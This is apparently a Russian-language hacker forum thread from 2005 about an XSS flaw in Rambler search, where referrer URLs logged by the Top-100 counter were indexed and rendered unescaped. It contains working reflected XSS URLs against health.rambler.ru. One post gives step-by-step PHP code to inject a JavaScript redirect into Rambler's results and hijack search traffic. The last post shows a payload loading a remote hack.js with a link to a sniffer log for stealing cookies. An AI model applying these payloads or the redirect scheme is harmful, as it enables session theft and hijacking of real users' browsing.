Люди, в рамблере есть дыра, тока чё с ней делать?? суть: Я на своём сайте делал какую то защиту от неправильных запросов к PHP , и прикола ради поставил скрипт на открытие cd и кучу алертов за неправильный запрос... И чё я вижу... проверяю позиции своего сайта, ввожу запрос в рамблер, он выдаёт по поиску сайты и вдруг у меня открывается крышка cd и вылетают бесконечные алерты ))) К привеликому сожалению, этой страницы уже давно нет, и чё я в ней писал не помню (теперь буду вспоминать...) но в исходнике страницы рамблера явно написан мой скрипт в таком плане: http://www.site.ru/page.php?id=001&bla-bla&bla-bla<script>.... Чё можно сделать, думайте сами... Кстати ща мысль родилась: если сделать на странице так: <a href="http://site.ru/page.php?<script>......</script>">bla-bla</a> Может он и её проиндексирует и отобразит в поиске как есть... Эх ждать долго ((
ВСПОМНИЛ !!!!! Я там такую херь писал: $id=$_GET['id']; ... $id = ereg_replace("[^0-9_]","<script>....</script>",$id); .... echo "bla-bla-bla".$id."bla-bla-bla"; чёто в этом духе ))) Какие есть соображения?
лишний раз доказывает, что в сети полно не защищённых компов. За пост - отдельно респект, если продумать, то можно и не только Cd открывать у пользователей
Интересно вроде вот xss.http://health.rambler.ru/drugs/results.html?words=%3Cscript%3Ealert%20(%27XSS%20by%20SanyaX%27)%3C/script%3E
Да, только вот с помощью этой xss пароль от ящика угнать не получится. Ведь mail.rambler.ru и health.rambler.ru разные сервера
мм Сервер вообщето один... но эт ничё не меняет... Кароч, я тут пытался разобраться, как он эту херь проиндексировал, и вот на что наткнулся: Стоит у меня на каждой страничке счётчик рамблера, а он сволочуга регистрирует всех рефереров с которых пришли на данную страницу... И... открыл я статистику посещений в рамблер топ-100, а там ЭТА ссылка (которой в реальности нет ! Но запрос такой был) http://site.ru/page.php?a=01&b=02&c='XSS<...> Вместо XSS - символы которые мой ПХП скрипт заменял на мой JAVASCRIPT , короче эта якобы-ссылка попала в базу рамблера , и при запросе в поиске rambler.ru с определённым ключевым словом Выскакивает мой Javascript в рамблере...... Что с этого можно поиметь ??? И как этим воспользоваться для того, чтобы поработить вселенную - теперь будем думать ))))
Остается только найти сайт, создать страницу, поставить на нее ссылку вида <сайт>/<страница>?<код> и ждать... Хотя я сомневаюсь, что Rambler может позволить себе такие уязвимости. Правда, если позволяет XSS в поисковых запросах - то вполне...
гы Вот решил вас приколоть..... Сделал тоже самое ( почти ) Я ж говорю, это легко, все якобы-ссылки он берёт из топ-100 , причём, я так понял, каждый день... Вчера эмулировал ссылку с неправильным запросом на мой ПХП скрипт, И вот что получилось: http://www.rambler.ru/srch?old_q=webbaza&words=webbaza+alert&btnG=%CD%E0%E9%F2%E8%21 (17.11.2005) З.Ы. Ссылка уже не работает , т.к. страницы нет, а был алерт в рамблере -) Это весело )) Так что, Kanick , не сомневайся!! Кстати, помоему, это не XSS уязвимость, а чёртиё знает какая.... Остаётся самое главное - будем думать как теперь мы поработим вселенную))
Как мне передали, дыра на Рамблере старая и бесперспективная. Рамблер даже куки не оставляет. Единственный возможный вариант использования - редирект на свой сайт. Что ж, отличный прием для раскрутки.
Угук. Раскрутить один раз сайт на слово "работа" (ну или порно) и все. Потом кто вобьет в поиске "работа" - редиректом на сайт Дмитро будет попадать (наращивая раскрутку как снежный ком). Дмитро - респект. Действительно откопал забавную штуку. =)
итог Вообщем , чтоб было всем понятнее, делаем так: 1) В index.php пишем повыше на странице : ******************************** <?php if(isset($_GET['ID'])){$ID = ereg_replace("[^0-9_]","<script language='Javascript'><!-- function reload() {location = \"http://ВАШ_САЙТ.ru\"}; setTimeout('reload()', 10); //--></script>",$_GET['ID']);} echo $ID; echo "<br><b>".$ID."</b><br><a href=\"http://ВАШ_САЙТ/?".$ID."\">". $ID."</a>"; ?> ********************************* // Зачем три раза повторять $ID ? - Чёртиво знает, откуда рамблер его тянет, толи из ссылки, толи из тега... кашу маслом не испортишь, а там можно и поэксперементировать )) 2) Затем делаем URL запрос http://ВАШ_САЙТ.ru/?ID=[Любые буквы или символы] желательно побольше таких запросов с разными буквами после "?" После чего счётчик rambler top-100 на этой странице фиксирует эти запросы, ( их можно посмотреть в статистике посещений ) , затем через какое-то время их индексирует поисковик рамблера. И всё ! 3) После индексации будет редирект на Ваш сайт прямо из Рамблера. А можно сделать ещё круче, т.е. сделать действительно снежный ком !! Создать массив слов и чисел, создать рандом переменную , состоящую из "слово+число" и добавить эту переменную в редирект, т.е. "http://Ваш_сайт.ru/?".$random тем самым получим цыкл... Ну вот вроде разжевали )))
Еще http://health.rambler.ru/drugs/results.html?words=<script>alert%20('XSS%20b%20y%20SNIFF')</script><script%20src=http://www.fath.jino-net.ru/hack.js></script> Потом на http://antichat.ru/sniff/log.php
